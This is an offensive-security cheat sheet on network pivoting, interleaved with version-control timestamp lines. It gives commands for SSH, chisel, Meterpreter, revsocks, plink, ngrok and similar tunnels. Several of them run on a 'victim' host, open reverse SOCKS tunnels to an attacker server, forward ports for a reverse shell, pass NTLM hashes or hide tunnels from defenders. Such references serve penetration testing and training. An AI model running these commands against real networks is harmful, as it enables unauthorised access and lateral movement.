2018-02-15 22:27:42 +00:00
# Network Pivoting Techniques
2019-06-09 16:13:15 +00:00
## Summary
* [Windows netsh Port Forwarding ](#windows-netsh-port-forwarding )
* [SSH ](#ssh )
* [SOCKS Proxy ](#socks-proxy )
* [Local Port Forwarding ](#local-port-forwarding )
* [Remote Port Forwarding ](#remote-port-forwarding )
* [Proxychains ](#proxychains )
2022-02-18 13:50:38 +00:00
* [Graftcp ](#graftcp )
2019-06-09 16:13:15 +00:00
* [Web SOCKS - reGeorg ](#web-socks---regeorg )
2021-06-27 21:58:13 +00:00
* [Web SOCKS - pivotnacci ](#web-socks---pivotnacci )
2019-06-09 16:13:15 +00:00
* [Metasploit ](#metasploit )
* [sshuttle ](#sshuttle )
2019-06-16 21:45:52 +00:00
* [chisel ](#chisel )
2020-06-18 09:55:48 +00:00
* [SharpChisel ](#sharpchisel )
* [gost ](#gost )
2019-06-09 16:13:15 +00:00
* [Rpivot ](#rpivot )
2020-02-20 15:51:22 +00:00
* [RevSocks ](#revsocks )
2019-06-09 16:13:15 +00:00
* [plink ](#plink )
* [ngrok ](#ngrok )
2022-08-15 13:02:29 +00:00
* [Capture a network trace with builtin tools ](#capture-a-network-trace-with-builtin-tools )
2019-06-09 16:13:15 +00:00
* [Basic Pivoting Types ](#basic-pivoting-types )
* [Listen - Listen ](#listen---listen )
* [Listen - Connect ](#listen---connect )
* [Connect - Connect ](#connect---connect )
* [References ](#references )
2018-06-09 16:56:19 +00:00
## Windows netsh Port Forwarding
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```powershell
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
2022-05-31 09:57:44 +00:00
# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
# Correctly open the port on the machine
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
2018-06-09 16:56:19 +00:00
```
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
1. listenaddress – is a local IP address waiting for a connection.
2. listenport – local listening TCP port (the connection is waited on it).
3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
4. connectport – is a TCP port to which the connection from listenport is forwarded to.
2018-02-15 22:27:42 +00:00
## SSH
### SOCKS Proxy
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```bash
2018-02-15 22:27:42 +00:00
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
```
2018-09-10 21:12:29 +00:00
Cool Tip : Konami SSH Port forwarding
```bash
[ENTER] + [~C]
-D 1090
```
2018-02-15 22:27:42 +00:00
### Local Port Forwarding
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```bash
2018-02-15 22:27:42 +00:00
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```
### Remote Port Forwarding
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```bash
2018-02-15 22:27:42 +00:00
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
2019-07-01 21:29:29 +00:00
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
2018-02-15 22:27:42 +00:00
```
## Proxychains
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
**Config file**: /etc/proxychains.conf
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```bash
[ProxyList]
socks4 localhost 8080
```
2018-08-12 21:30:22 +00:00
2018-08-26 13:43:26 +00:00
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
2018-02-15 22:27:42 +00:00
2021-12-29 17:16:26 +00:00
## Graftcp
2020-07-12 12:44:33 +00:00
2021-12-29 17:16:26 +00:00
> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy.
2020-07-12 12:44:33 +00:00
2021-12-29 17:16:26 +00:00
:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications.
```ps1
# https://github.com/hmgle/graftcp
# Create a SOCKS5, using Chisel or another tool and forward it through SSH
(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse
(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks
# Run graftcp and specify the SOCKS5
(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
(attacker) $ graftcp ./nuclei -u http://172.16.1.24
```
Simple configuration file for graftcp
```py
# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf
## Listen address (default ":2233")
listen = :2233
loglevel = 1
## SOCKS5 address (default "127.0.0.1:1080")
socks5 = 127.0.0.1:1080
# socks5_username = SOCKS5USERNAME
# socks5_password = SOCKS5PASSWORD
## Set the mode for select a proxy (default "auto")
select_proxy_mode = auto
2020-07-12 12:44:33 +00:00
```
2021-12-29 17:16:26 +00:00
2018-02-15 22:27:42 +00:00
## Web SOCKS - reGeorg
2018-08-12 21:30:22 +00:00
[reGeorg ](https://github.com/sensepost/reGeorg ), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
2018-11-24 12:49:08 +00:00
Drop one of the following files on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
2018-08-12 21:30:22 +00:00
```python
2018-11-24 12:49:08 +00:00
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
```
2021-06-27 21:58:13 +00:00
## Web SOCKS - pivotnacci
[pivotnacci ](https://github.com/blackarrowsec/pivotnacci ), a tool to make socks connections through HTTP agents.
```powershell
pip3 install pivotnacci
pivotnacci https://domain.com/agent.php --password "s3cr3t"
pivotnacci https://domain.com/agent.php --polling-interval 2000
```
2018-11-24 12:49:08 +00:00
## Metasploit
2019-06-10 09:00:54 +00:00
```powershell
# Meterpreter list active port forwards
portfwd list
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add – l 3389 – p 3389 – r target-host
2019-06-09 11:46:40 +00:00
portfwd add -l 88 -p 88 -r 127.0.0.1
2018-11-24 12:49:08 +00:00
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
2019-06-10 09:00:54 +00:00
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete – l 3389 – p 3389 – r target-host
# Meterpreter delete all port forwards
portfwd flush
2018-11-24 12:49:08 +00:00
or
2019-06-10 09:00:54 +00:00
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24
2020-12-17 07:56:58 +00:00
use auxiliary/server/socks_proxy
set SRVPORT 9090
set VERSION 4a
# or
use auxiliary/server/socks4a # (deprecated)
2019-06-10 09:00:54 +00:00
# Meterpreter list all active routes
run autoroute -p
route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3
# Meterpreter delete all routes
route flush
2018-02-15 22:27:42 +00:00
```
2020-12-17 07:56:58 +00:00
## Empire
```powershell
(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10
(Empire) > run
```
2019-06-09 16:13:15 +00:00
## sshuttle
2019-06-29 15:55:13 +00:00
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
* Doesn't require admin.
* Works with Linux and MacOS.
* Supports DNS tunneling.
2019-06-09 16:13:15 +00:00
```powershell
2019-06-29 15:55:13 +00:00
pacman -Sy sshuttle
apt-get install sshuttle
2019-06-09 16:13:15 +00:00
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24
2020-04-26 19:43:42 +00:00
# using a private key
$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
2020-05-24 12:09:46 +00:00
# -x == exclude some network to not transmit over the tunnel
# -x x.x.x.x.x/24
2019-06-09 16:13:15 +00:00
```
2019-06-16 21:45:52 +00:00
## chisel
```powershell
go get -v github.com/jpillora/chisel
# forward port 389 and 88 to hacker computer
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
2022-02-18 13:50:38 +00:00
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
# SOCKS
user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks
2019-06-16 21:45:52 +00:00
```
2020-06-18 09:55:48 +00:00
### SharpChisel
A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel
```powershell
user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com"
================================================================
server : run the Server Component of chisel
-p 8080 : run server on port 8080
--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
--auth "user:pass" : Creds required to connect to the server
--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.
user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks
```
2020-10-08 09:23:12 +00:00
## Ligolo
Ligolo : Reverse Tunneling made easy for pentesters, by pentesters
1. Build Ligolo
```powershell
# Get Ligolo and dependencies
cd `go env GOPATH` /src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
# Generate self-signed TLS certificates (will be placed in the certs folder)
make certs TLS_HOST=example.com
make build-all
```
2. Use Ligolo
```powershell
# On your attack server.
./bin/localrelay_linux_amd64
# On the compromise host.
ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
```
2020-06-18 09:55:48 +00:00
## Gost
> Wiki English : https://docs.ginuerzh.xyz/gost/en/
```powershell
git clone https://github.com/ginuerzh/gost
cd gost/cmd/gost
go build
# Socks5 Proxy
Server side: gost -L=socks5://:1080
Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
# Local Port Forward
gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
```
2018-02-15 22:27:42 +00:00
## Rpivot
Server (Attacker box)
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
```
Client (Compromised box)
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python client.py --server-ip < ip > --server-port 9443
```
Through corporate proxy
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
```
Passing the hash
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
```
2020-02-20 15:51:22 +00:00
## revsocks
```powershell
# Listen on the server and create a SOCKS 5 proxy on port 1080
user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234
# Connect client to the server
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10"
```
```powershell
# Build for Linux
git clone https://github.com/kost/revsocks
export GOPATH=~/go
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
go build
go build -ldflags="-s -w" & & upx --brute revsocks
# Build for Windows
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w"
go build -ldflags -H=windowsgui
upx revsocks
```
2018-10-18 15:32:01 +00:00
## plink
```powershell
2019-08-28 23:08:26 +00:00
# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:127.0.0.1:445
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389
2018-10-18 15:32:01 +00:00
plink -l root -pw mypassword 192.168.18.84 -R
2019-06-09 16:13:15 +00:00
plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
2019-08-28 23:08:26 +00:00
2018-10-18 15:32:01 +00:00
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
2019-08-28 23:08:26 +00:00
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185
2018-10-18 15:32:01 +00:00
```
2019-04-14 22:49:56 +00:00
## ngrok
```powershell
# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433
```
2020-10-03 19:34:28 +00:00
## cloudflared
2019-04-14 22:49:56 +00:00
2020-10-03 19:34:28 +00:00
```bash
# Get the binary
wget https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.tgz
tar xvzf cloudflared-stable-linux-amd64.tgz
# Expose accessible internal service to the internet
./cloudflared tunnel --url < protocol > ://< host > :< port >
```
2022-08-15 13:02:29 +00:00
## Capture a network trace with builtin tools
* Windows (netsh)
```ps1
# start a capture use the netsh command.
netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
# stop the trace
netsh trace stop
# Event tracing can be also used across a reboots
netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
# To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
etl2pcapng.exe c:\trace.etl c:\trace.pcapng
# Use filters
netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
```
* Linux (tcpdump)
```ps1
sudo apt-get install tcpdump
tcpdump -w 0001.pcap -i eth0
tcpdump -A -i eth0
# capture every TCP packet
tcpdump -i eth0 tcp
# capture everything on port 22
tcpdump -i eth0 port 22
```
2020-10-03 19:34:28 +00:00
2018-02-15 22:27:42 +00:00
## Basic Pivoting Types
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| Listen - Listen | Exposed asset, may not want to connect out. |
| Listen - Connect | Normal redirect. |
| Connect - Connect | Can’ t bind, so connect to bridge two hosts |
2019-06-09 16:13:15 +00:00
### Listen - Listen
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"` |
| socat | `socat -v tcp-listen:8080 tcp-listen:9090` |
| remote host 1 | `ncat localhost 8080 < file` |
| remote host 2 | `ncat localhost 9090 > newfile` |
2019-06-09 16:13:15 +00:00
### Listen - Connect
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat localhost -p 8080 < file` |
| remote host 2 | `ncat -l -p 9090 > newfile` |
2019-06-09 16:13:15 +00:00
### Connect - Connect
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
2019-08-29 07:49:09 +00:00
| remote host 1 | `ncat -l -p 8080 < file` |
2018-02-15 22:27:42 +00:00
| remote host 2 | `ncat -l -p 9090 > newfile` |
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
* [Port Forwarding in Windows - Windows OS Hub ](http://woshub.com/port-forwarding-in-windows/ )
2018-10-08 11:49:50 +00:00
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin ](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences )
2018-11-24 12:49:08 +00:00
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko ](https://artkond.com/2017/03/23/pivoting-guide/ )
2019-08-29 07:49:09 +00:00
* [Pivoting Meterpreter ](https://www.information-security.fr/pivoting-meterpreter/ )
2022-06-20 18:31:11 +00:00
* 🇫🇷 [Etat de l’ art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI ](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/ ) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
2020-10-02 18:55:36 +00:00
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8 ](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49 )
2022-06-20 18:31:11 +00:00
* [Active Directory - hideandsec ](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory )
2022-08-15 13:02:29 +00:00
* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert ](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/ )